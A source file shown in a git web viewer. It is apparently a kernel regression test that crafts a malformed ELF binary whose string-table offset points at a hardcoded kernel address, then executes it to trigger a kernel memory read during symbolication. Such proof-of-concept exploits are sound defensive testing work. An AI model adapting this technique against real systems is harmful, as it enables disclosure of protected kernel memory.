summaryrefslogtreecommitdiff
path: root/Tests/Kernel/elf-symbolication-kernel-read-exploit.cpp
blob: 8ef6604eba6ac028ed4fe461a67ddbc8ac16ea2a (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#include <LibELF/exec_elf.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

asm("haxcode:\n"
    "1: jmp 1b\n"
    "haxcode_end:\n");

extern "C" void haxcode();
extern "C" void haxcode_end();

int main()
{
    char buffer[16384];

    auto& header = *(Elf32_Ehdr*)buffer;
    header.e_ident[EI_MAG0] = ELFMAG0;
    header.e_ident[EI_MAG1] = ELFMAG1;
    header.e_ident[EI_MAG2] = ELFMAG2;
    header.e_ident[EI_MAG3] = ELFMAG3;
    header.e_ident[EI_CLASS] = ELFCLASS32;
    header.e_ident[EI_DATA] = ELFDATA2LSB;
    header.e_ident[EI_VERSION] = EV_CURRENT;
    header.e_ident[EI_OSABI] = ELFOSABI_SYSV;
    header.e_ident[EI_ABIVERSION] = 0;
    header.e_type = ET_EXEC;
    header.e_version = EV_CURRENT;
    header.e_ehsize = sizeof(Elf32_Ehdr);
    header.e_machine = EM_386;
    header.e_shentsize = sizeof(Elf32_Shdr);

    header.e_phnum = 1;
    header.e_phoff = 52;
    header.e_phentsize = sizeof(Elf32_Phdr);

    auto* ph = (Elf32_Phdr*)(&buffer[header.e_phoff]);
    ph[0].p_vaddr = 0x20000000;
    ph[0].p_type = PT_LOAD;
    ph[0].p_filesz = sizeof(buffer);
    ph[0].p_memsz = sizeof(buffer);
    ph[0].p_flags = PF_R | PF_X;
    ph[0].p_align = PAGE_SIZE;

    header.e_shnum = 3;
    header.e_shoff = 1024;

    u32 secret_address = 0x00184658;

    auto* sh = (Elf32_Shdr*)(&buffer[header.e_shoff]);
    sh[0].sh_type = SHT_SYMTAB;
    sh[0].sh_offset = 2048;
    sh[0].sh_entsize = sizeof(Elf32_Sym);
    sh[0].sh_size = 2 * sizeof(Elf32_Sym);

    sh[1].sh_type = SHT_STRTAB;
    sh[1].sh_offset = secret_address - 0x01001000;
    sh[1].sh_entsize = 0;
    sh[1].sh_size = 1024;

    sh[2].sh_type = SHT_STRTAB;
    sh[2].sh_offset = 4096;
    sh[2].sh_entsize = 0;
    sh[2].sh_size = 1024;
    header.e_shstrndx = 2;

    auto* sym = (Elf32_Sym*)(&buffer[2048]);
    sym[0].st_value = 0x20002000;
    sym[0].st_name = 0;

    sym[1].st_value = 0x30000000;
    sym[1].st_name = 0;

    auto* strtab = (char*)&buffer[3072];
    strcpy(strtab, "sneaky!");

    auto* shstrtab = (char*)&buffer[4096];
    strcpy(shstrtab, ".strtab");

    auto* code = &buffer[8192];
    size_t haxcode_size = (u32)haxcode_end - (u32)haxcode;
    printf("memcpy(%p, %p, %zu)\n", code, haxcode, haxcode_size);
    memcpy(code, (void*)haxcode, haxcode_size);

    header.e_entry = 0x20000000 + 8192;

    int fd = open("x", O_RDWR | O_CREAT, 0777);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    int nwritten = write(fd, buffer, sizeof(buffer));
    if (nwritten < 0) {
        perror("write");
        return 1;
    }

    if (execl("/home/anon/x", "x", nullptr) < 0) {
        perror("execl");
        return 1;
    }

    return 0;
}